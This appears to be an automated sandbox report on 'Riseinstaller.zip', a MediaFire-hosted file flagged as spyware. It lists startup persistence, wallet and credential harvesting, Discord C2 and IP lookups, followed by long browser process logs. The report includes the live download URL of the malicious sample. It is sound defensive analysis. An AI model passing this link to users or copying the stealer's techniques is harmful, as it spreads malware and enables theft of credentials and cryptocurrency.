hxxps://www[.]mediafire[.]com/file/x09kfni5o3qk1vi/Riseinstaller[.]zip/file

Analysis

max time kernel
170s
max time network
170s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
28-04-2024 16:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/x09kfni5o3qk1vi/Riseinstaller.zip/file

Score

7^/10

spyware

Malware Config

Signatures

Drops startup file 1 IoCs

Processes:

Rise installer.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rise installer.exe Rise installer.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rise installer.exe	Rise installer.exe

Loads dropped DLL 47 IoCs

Processes:

Rise installer.exe

pid	process
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe
916	Rise installer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

232 discord.com
244 discord.com
174 discord.com
225 discord.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

123 api.ipify.org
221 api.ipify.org
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3644 tasklist.exe

flow	ioc
232	discord.com
244	discord.com
174	discord.com
225	discord.com

flow	ioc
123	api.ipify.org
221	api.ipify.org

pid	process
3644	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 2 IoCs

Processes:

msedge.exeMiniSearchHost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Riseinstaller.zip:Zone.Identifier msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Riseinstaller.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exe

pid	process
3432	msedge.exe
3432	msedge.exe
2704	msedge.exe
2704	msedge.exe
4140	identity_helper.exe
4140	identity_helper.exe
5256	msedge.exe
5256	msedge.exe
6112	msedge.exe
6112	msedge.exe
6116	msedge.exe
6116	msedge.exe
6116	msedge.exe
6116	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 31 IoCs

Processes:

msedge.exe

pid	process
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

tasklist.exe

description pid process

Token: SeDebugPrivilege 3644 tasklist.exe

description	pid	process
Token: SeDebugPrivilege	3644	tasklist.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

Processes:

msedge.exe

pid	process
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MiniSearchHost.exe

pid process

5032 MiniSearchHost.exe

pid	process
5032	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2704 wrote to memory of 2796	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2796	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 2308	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3432	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3432	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe
PID 2704 wrote to memory of 3296	2704	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x09kfni5o3qk1vi/Riseinstaller.zip/file
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa49803cb8,0x7ffa49803cc8,0x7ffa49803cd8
2⤵
PID:2796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
2⤵
PID:2308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
2⤵
PID:3296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
2⤵
PID:4792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
2⤵
PID:2328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
2⤵
PID:2280

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5760 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
2⤵
PID:4848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
2⤵
PID:3560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
2⤵
PID:4584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
2⤵
PID:1304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
2⤵
PID:1396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
2⤵
PID:4876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
2⤵
PID:2744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
2⤵
PID:2808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1
2⤵
PID:4292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1
2⤵
PID:2988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
2⤵
PID:1556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
2⤵
PID:3276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7792 /prefetch:1
2⤵
PID:132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8276 /prefetch:1
2⤵
PID:5328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:1
2⤵
PID:5340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8612 /prefetch:1
2⤵
PID:5460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8868 /prefetch:1
2⤵
PID:5532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9028 /prefetch:1
2⤵
PID:5600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:1
2⤵
PID:5668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9256 /prefetch:1
2⤵
PID:5732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9572 /prefetch:1
2⤵
PID:5796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9604 /prefetch:1
2⤵
PID:5804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1
2⤵
PID:5956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9240 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
2⤵
PID:4832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9644 /prefetch:1
2⤵
PID:4504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:1
2⤵
PID:5612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9732 /prefetch:1
2⤵
PID:5636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:6112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7532 /prefetch:2
2⤵
